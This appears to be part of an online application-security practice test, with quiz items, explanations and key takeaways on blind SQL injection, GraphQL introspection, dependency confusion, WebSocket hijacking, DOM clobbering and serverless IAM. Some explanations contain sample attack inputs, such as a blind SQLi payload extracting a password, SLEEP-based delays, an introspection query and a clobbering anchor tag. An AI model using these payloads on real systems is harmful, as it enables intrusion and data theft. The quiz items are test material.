IV (Initialization Vector) / Nonce reuse is catastrophically broken for stream ciphers and CTR/GCM block cipher modes. A stream cipher generates a keystream by combining the secret key with a unique IV: ciphertext = plaintext XOR keystream. If the same key+IV pair is reused for two different plaintexts (C1 = P1 XOR K, C2 = P2 XOR K), then C1 XOR C2 = P1 XOR P2 β the keystream cancels out, and statistical analysis recovers both plaintexts. WEP used RC4 with short 24-bit IVs (65,536 possible values), guaranteeing collisions on busy networks. The Attack was demonstrated in minutes. For AES-GCM, IV reuse not only recovers plaintexts but directly reveals the authentication key, breaking all integrity protection. Fix: use random IVs (CSPRNG), never reuse nonces, prefer SIV (Synthetic IV) constructions that are nonce-misuse-resistant.
12How does a "Blind SQL Injection" differ from a traditional In-Band SQL Injection?
CorrectC: The application does not return database errors or data to the screen; the attacker must infer information by asking boolean true/false questions or measuring artificial time delays (e.g., SLEEP(10))
In-Band SQLi is characterized by the database response being returned directly in the HTTP response β error-based (database error reveals the query structure) or UNION-based (attacker appends UNION SELECT to return data in the original query's result). Blind SQLi applies when the application is injectable but provides no visual feedback. Two blind techniques: (1) Boolean-Based β inject a condition that changes application behavior for true vs. false (different page content, redirect); extract data character-by-character: id=1 AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'-- ; binary search reduces queries per character to ~7; (2) Time-Based β inject SLEEP(n)/WAITFOR DELAY and measure HTTP response time as the oracle. Both methods are tedious but equally impactful. SQLMap automates both with its --technique=BT flags.
IncorrectC: The application does not return database errors or data to the screen; the attacker must infer information by asking boolean true/false questions or measuring artificial time delays (e.g., SLEEP(10))
In-Band SQLi is characterized by the database response being returned directly in the HTTP response β error-based (database error reveals the query structure) or UNION-based (attacker appends UNION SELECT to return data in the original query's result). Blind SQLi applies when the application is injectable but provides no visual feedback. Two blind techniques: (1) Boolean-Based β inject a condition that changes application behavior for true vs. false (different page content, redirect); extract data character-by-character: id=1 AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'-- ; binary search reduces queries per character to ~7; (2) Time-Based β inject SLEEP(n)/WAITFOR DELAY and measure HTTP response time as the oracle. Both methods are tedious but equally impactful. SQLMap automates both with its --technique=BT flags.
13In API Security, what is the distinction between Rate Limiting and Throttling?
CorrectA: Rate limiting restricts the total number of requests a user can make in a given timeframe; Throttling slows down the processing speed of requests once a threshold is reached
Rate Limiting sets a hard cap: once a client exceeds N requests in T seconds, subsequent requests receive 429 Too Many Requests until the window resets. It prevents brute-force attacks, credential stuffing, account enumeration, and API abuse. Throttling progressively reduces processing speed (or response priority) as usage increases, rather than hard-blocking β allowing some degraded service. In API security, both are essential: rate limiting prevents enumeration and DoS; throttling protects backend resource pools from legitimate spike traffic. OWASP API Security Top 10 lists "Unrestricted Resource Consumption" (API4:2023) β previously "Lack of Resources & Rate Limiting" β as a major API vulnerability. Implementation: token bucket or leaky bucket algorithms; commonly applied at the API gateway layer.
IncorrectA: Rate limiting restricts the total number of requests a user can make in a given timeframe; Throttling slows down the processing speed of requests once a threshold is reached
Rate Limiting sets a hard cap: once a client exceeds N requests in T seconds, subsequent requests receive 429 Too Many Requests until the window resets. It prevents brute-force attacks, credential stuffing, account enumeration, and API abuse. Throttling progressively reduces processing speed (or response priority) as usage increases, rather than hard-blocking β allowing some degraded service. In API security, both are essential: rate limiting prevents enumeration and DoS; throttling protects backend resource pools from legitimate spike traffic. OWASP API Security Top 10 lists "Unrestricted Resource Consumption" (API4:2023) β previously "Lack of Resources & Rate Limiting" β as a major API vulnerability. Implementation: token bucket or leaky bucket algorithms; commonly applied at the API gateway layer.
14In GraphQL API security, what does a malicious "Introspection Query" attempt to do?
CorrectD: It exploits the native introspection feature of GraphQL to map out the entire API schema, exposing hidden queries, mutations, and backend structures
GraphQL's introspection system is a built-in feature that allows clients to query the schema itself: {__schema { types { name fields { name type { name } } } }}. This returns a complete map of every type, query, mutation, argument, and field in the API β including internal admin queries and sensitive mutations that are not linked from the public UI. Attackers use this for reconnaissance before crafting targeted exploits. The query { __typename } can confirm a GraphQL endpoint exists. Best practices: disable introspection in production (it serves no legitimate user purpose), implement query depth limits and cost analysis to prevent DoS via deeply nested queries (GraphQL does not limit query complexity by default), and use persisted queries (query allow-listing for trusted clients).
IncorrectD: It exploits the native introspection feature of GraphQL to map out the entire API schema, exposing hidden queries, mutations, and backend structures
GraphQL's introspection system is a built-in feature that allows clients to query the schema itself: {__schema { types { name fields { name type { name } } } }}. This returns a complete map of every type, query, mutation, argument, and field in the API β including internal admin queries and sensitive mutations that are not linked from the public UI. Attackers use this for reconnaissance before crafting targeted exploits. The query { __typename } can confirm a GraphQL endpoint exists. Best practices: disable introspection in production (it serves no legitimate user purpose), implement query depth limits and cost analysis to prevent DoS via deeply nested queries (GraphQL does not limit query complexity by default), and use persisted queries (query allow-listing for trusted clients).
15What is the concept of "Dependency Confusion" (Dependency Squatting) in CI/CD pipeline security?
CorrectC: An attacker uploads a malicious package to a public registry using the exact name of a company's internal, private package, tricking the build system into downloading the malicious version
Dependency Confusion (discovered and disclosed by researcher Alex Birsan in 2021) exploits how package managers resolve package sources. Many companies host internal packages by name (e.g., company-auth-utils) on a private registry. When a build system is configured to check both private and public registries, or when the private registry fails, the package manager may look up the name in the public registry (npm, PyPI, RubyGems). An attacker registers a package with the same name on the public registry at a higher version number β the build system downloads and executes the attacker's malicious version instead. Birsan received $130,000+ in bug bounties after demonstrating this against Apple, Microsoft, Netflix, Shopify, PayPal, Uber, and Tesla. Fix: namespace scoping (@company/package-name), exact hash pinning, lock files, and configure package managers to use private registry only for internal package names.
IncorrectC: An attacker uploads a malicious package to a public registry using the exact name of a company's internal, private package, tricking the build system into downloading the malicious version
Dependency Confusion (discovered and disclosed by researcher Alex Birsan in 2021) exploits how package managers resolve package sources. Many companies host internal packages by name (e.g., company-auth-utils) on a private registry. When a build system is configured to check both private and public registries, or when the private registry fails, the package manager may look up the name in the public registry (npm, PyPI, RubyGems). An attacker registers a package with the same name on the public registry at a higher version number β the build system downloads and executes the attacker's malicious version instead. Birsan received $130,000+ in bug bounties after demonstrating this against Apple, Microsoft, Netflix, Shopify, PayPal, Uber, and Tesla. Fix: namespace scoping (@company/package-name), exact hash pinning, lock files, and configure package managers to use private registry only for internal package names.
16Why are WebSockets particularly vulnerable to Cross-Site WebSocket Hijacking (CSWSH) if improperly configured?
CorrectA: WebSockets do not strictly enforce the Same-Origin Policy (SOP) by default, relying entirely on the developer to manually validate the Origin header during the initial handshake
CSWSH is a WebSocket-specific CSRF variant. The browser's Same-Origin Policy prevents cross-origin reading of XMLHttpRequest/fetch responses, but WebSocket connections are NOT blocked by SOP β browsers send cookies with the initial handshake to any origin. If the server doesn't validate the Origin header during the HTTP β WebSocket upgrade request, a malicious cross-origin page can establish a full bidirectional WebSocket connection authenticated with the victim's session cookies. The attacker receives all real-time server-pushed data and can send commands as the authenticated user. Prevention: (1) Validate the Origin header server-side on the WebSocket handshake, allowing only trusted origins; (2) Use CSRF tokens in the WebSocket connection URL as a query parameter; (3) Implement proper authentication tokens in the WebSocket protocol, not just cookie-based authentication.
IncorrectA: WebSockets do not strictly enforce the Same-Origin Policy (SOP) by default, relying entirely on the developer to manually validate the Origin header during the initial handshake
CSWSH is a WebSocket-specific CSRF variant. The browser's Same-Origin Policy prevents cross-origin reading of XMLHttpRequest/fetch responses, but WebSocket connections are NOT blocked by SOP β browsers send cookies with the initial handshake to any origin. If the server doesn't validate the Origin header during the HTTP β WebSocket upgrade request, a malicious cross-origin page can establish a full bidirectional WebSocket connection authenticated with the victim's session cookies. The attacker receives all real-time server-pushed data and can send commands as the authenticated user. Prevention: (1) Validate the Origin header server-side on the WebSocket handshake, allowing only trusted origins; (2) Use CSRF tokens in the WebSocket connection URL as a query parameter; (3) Implement proper authentication tokens in the WebSocket protocol, not just cookie-based authentication.
17What security protection does the X-Content-Type-Options: nosniff HTTP header provide?
CorrectB: It prevents the browser from attempting to guess the MIME type of a file, forcing it to stick to the declared Content-Type, mitigating polyglot file uploads and drive-by downloads
Browsers historically performed "MIME type sniffing" β if the declared Content-Type didn't match what the content looked like (e.g., an image response that starts with <script>), the browser would re-interpret it as the sniffed type and potentially execute it as JavaScript. X-Content-Type-Options: nosniff disables this behaviour, forcing the browser to treat the response strictly as the declared Content-Type. This blocks the "polyglot" attack: an uploaded file that is simultaneously a valid JPEG and valid JavaScript, uploaded as image/jpeg but executed as script when loaded in a script context. It also prevents MIME-confusion attacks where a text/plain response is executed as text/html (or script). This is a low-cost, high-value header that should always be included in API and file-serving responses.
IncorrectB: It prevents the browser from attempting to guess the MIME type of a file, forcing it to stick to the declared Content-Type, mitigating polyglot file uploads and drive-by downloads
Browsers historically performed "MIME type sniffing" β if the declared Content-Type didn't match what the content looked like (e.g., an image response that starts with <script>), the browser would re-interpret it as the sniffed type and potentially execute it as JavaScript. X-Content-Type-Options: nosniff disables this behaviour, forcing the browser to treat the response strictly as the declared Content-Type. This blocks the "polyglot" attack: an uploaded file that is simultaneously a valid JPEG and valid JavaScript, uploaded as image/jpeg but executed as script when loaded in a script context. It also prevents MIME-confusion attacks where a text/plain response is executed as text/html (or script). This is a low-cost, high-value header that should always be included in API and file-serving responses.
18What is "DOM Clobbering"?
CorrectC: An advanced technique where an attacker injects HTML elements (like id or name attributes) that overwrite global JavaScript variables or window properties, altering the execution flow of the client-side script
DOM Clobbering exploits the HTML spec behavior where elements with id or name attributes are automatically exposed as properties of the window (global) object. If an application uses a pattern like: let config = window.config || {}, and an attacker can inject <a id="config" href="javascript:..."> into the HTML, they overwrite window.config. Advanced techniques involve nesting anchor tags to create multi-level object hierarchies: <form id="x"><input id="y" name="z"></form> makes window.x.y.z accessible. This is particularly exploitable in applications using DOMPurify (older versions) or other HTML sanitizers that allow id/name attributes β the sanitizer doesn't remove the HTML but the browser's JS engine gets clobbered globals. Prevention: don't rely on global window property existence checks for security-sensitive logic; forbid id/name attributes in user-generated HTML.
IncorrectC: An advanced technique where an attacker injects HTML elements (like id or name attributes) that overwrite global JavaScript variables or window properties, altering the execution flow of the client-side script
DOM Clobbering exploits the HTML spec behavior where elements with id or name attributes are automatically exposed as properties of the window (global) object. If an application uses a pattern like: let config = window.config || {}, and an attacker can inject <a id="config" href="javascript:..."> into the HTML, they overwrite window.config. Advanced techniques involve nesting anchor tags to create multi-level object hierarchies: <form id="x"><input id="y" name="z"></form> makes window.x.y.z accessible. This is particularly exploitable in applications using DOMPurify (older versions) or other HTML sanitizers that allow id/name attributes β the sanitizer doesn't remove the HTML but the browser's JS engine gets clobbered globals. Prevention: don't rely on global window property existence checks for security-sensitive logic; forbid id/name attributes in user-generated HTML.
19When securing Serverless Architectures (e.g., AWS Lambda, Azure Functions), what is a critical AppSec risk distinct to this model?
CorrectB: Functions are often granted overly permissive IAM execution roles, meaning a single code injection flaw in a minor function can lead to widespread cloud environment compromise
In serverless architectures, the Principle of Least Privilege is critically important but frequently violated. Functions are often assigned IAM execution roles with wildcard permissions (s3:*, dynamodb:*) β either for convenience during development or misconfiguration. A single code injection vulnerability (SQLi, command injection, SSRF, XXE) in one low-importance function that has a broad IAM role can pivot to: reading all S3 buckets (data exfiltration), writing to DynamoDB tables (data tampering), invoking other Lambda functions (lateral movement), or calling STS to generate tokens for further escalation. The serverless attack surface also includes event injection (SNS messages, API Gateway headers, SQS messages as injection vectors) and shared execution environments. Apply per-function least-privilege IAM, code signing, and defense-in-depth monitoring (AWS CloudTrail, GuardDuty).
IncorrectB: Functions are often granted overly permissive IAM execution roles, meaning a single code injection flaw in a minor function can lead to widespread cloud environment compromise
In serverless architectures, the Principle of Least Privilege is critically important but frequently violated. Functions are often assigned IAM execution roles with wildcard permissions (s3:*, dynamodb:*) β either for convenience during development or misconfiguration. A single code injection vulnerability (SQLi, command injection, SSRF, XXE) in one low-importance function that has a broad IAM role can pivot to: reading all S3 buckets (data exfiltration), writing to DynamoDB tables (data tampering), invoking other Lambda functions (lateral movement), or calling STS to generate tokens for further escalation. The serverless attack surface also includes event injection (SNS messages, API Gateway headers, SQS messages as injection vectors) and shared execution environments. Apply per-function least-privilege IAM, code signing, and defense-in-depth monitoring (AWS CloudTrail, GuardDuty).
20In modern cloud-native Application Security, what is "eBPF" (Extended Berkeley Packet Filter) primarily used for?
CorrectA: To safely run sandboxed programs within the operating system kernel, providing deep, high-performance observability and security monitoring of application behavior without modifying the application code
eBPF (Extended Berkeley Packet Filter) is a revolutionary Linux kernel technology that allows sandboxed programs to run inside the kernel in response to events β syscalls, kprobes, tracepoints, network packets β without modifying kernel source or loading kernel modules (significantly reducing crash risk). For application security, eBPF enables: (1) Runtime Security Monitoring β Cilium Tetragon, Falco, and Aqua's aquasec-enforcer use eBPF to monitor every syscall, file access, network connection, and process execution by containerized applications and alert on anomalous behavior; (2) Network Observability β Pixie, Cilium generate automatic service maps and capture L7 traffic for forensics; (3) Performance-Zero-Cost Tracing β without injecting agents into the application process. eBPF is rapidly replacing traditional agent-based APM approaches for security telemetry in Kubernetes environments.
IncorrectA: To safely run sandboxed programs within the operating system kernel, providing deep, high-performance observability and security monitoring of application behavior without modifying the application code
eBPF (Extended Berkeley Packet Filter) is a revolutionary Linux kernel technology that allows sandboxed programs to run inside the kernel in response to events β syscalls, kprobes, tracepoints, network packets β without modifying kernel source or loading kernel modules (significantly reducing crash risk). For application security, eBPF enables: (1) Runtime Security Monitoring β Cilium Tetragon, Falco, and Aqua's aquasec-enforcer use eBPF to monitor every syscall, file access, network connection, and process execution by containerized applications and alert on anomalous behavior; (2) Network Observability β Pixie, Cilium generate automatic service maps and capture L7 traffic for forensics; (3) Performance-Zero-Cost Tracing β without injecting agents into the application process. eBPF is rapidly replacing traditional agent-based APM approaches for security telemetry in Kubernetes environments.
Conclusion: Mastering Application Security
Application Security is not a product you buy β it is a continuous discipline woven into every phase of your Software Development Life Cycle. From writing the first line of code with an IDE security plugin to deploying with container image signing and monitoring with eBPF-based runtime detection, security is everyone's responsibility across the engineering organization.
The questions in this test map directly to skills assessed in certifications like CSSLP, CEH, GWEB, and OSWE, and to the day-to-day vocabulary of security engineers at FAANG-scale organizations. Understanding why parameterized queries make injection structurally impossible, how gadget chains enable deserialization RCE, and why IMDSv2 breaks SSRF-to-credential-theft pivots gives you the conceptual foundation to both break and build secure systems.
Revisit the questions you missed, study their detailed explanations, and pair this practice test with the full Application Security Theory Guide for comprehensive exam and interview preparation.
Key Takeaways β Application Security
- Shift Left β find and fix vulnerabilities during Design and Coding (SAST, threat modeling) where they cost 6β100Γ less than in production.
- Parameterized Queries are the definitive fix for SQL injection β they make injection structurally impossible by separating code from data at the database protocol level.
- JWT "alg:none" β always explicitly configure and enforce the expected signing algorithm server-side; never trust the algorithm from the untrusted token header.
- SSRF in AWS β require IMDSv2 and deny-by-default egress rules; the primary SSRF target is 169.254.169.254 for temporary IAM credentials.
- Defense in Depth β WAF + parameterized queries + authorization checks + encryption + logging: failure of any one control must not result in full compromise.
- Least Privilege β especially critical in serverless: overly permissive Lambda IAM roles turn a single code injection into cloud-wide compromise.
Quick Review & Summary
Use this table to consolidate Application Security mappings before or after attempting the questions above.
| Concept / Attack | Category | Primary Defense | OWASP / Standard |
|---|---|---|---|
| SQL Injection | Injection | Parameterized Queries (Prepared Statements) | A03 |
| Cross-Site Scripting (XSS) | Injection | Output Encoding + Content-Security-Policy | A03 |
| CSRF | Auth/Session | Anti-CSRF Token + SameSite Cookie | A07 |
| SSRF | Server-Side | Allow-list URLs + deny egress to IMDS (IMDSv2) | A10 |
| IDOR / BOLA | Access Control | Per-resource server-side authorization checks | A01 |
| Insecure Deserialization | Data Integrity | Avoid deserializing untrusted data; sign objects | A08 |
| JWT alg:none | Auth | Enforce expected algorithm; never trust header | A07 |
| SSTI | Injection - RCE | Never pass user input as template; use logic-less templates | A03 |
| Prototype Pollution | JavaScript / Node.js | Sanitize keys; use Map instead of Object | A03 |
Frequently Asked Questions
Q. What is Application Security (AppSec)?
Q. What are the most common application security vulnerabilities?
Q. What is the difference between SAST and DAST?
Q. What is Input Validation and why is it critical?
Q. What is a Content Security Policy (CSP)?
Q. How does parameterized queries prevent SQL Injection?
Q. What is Threat Modeling in application security?
Struggling with some questions? Re-read the full Theory Guide: Application Security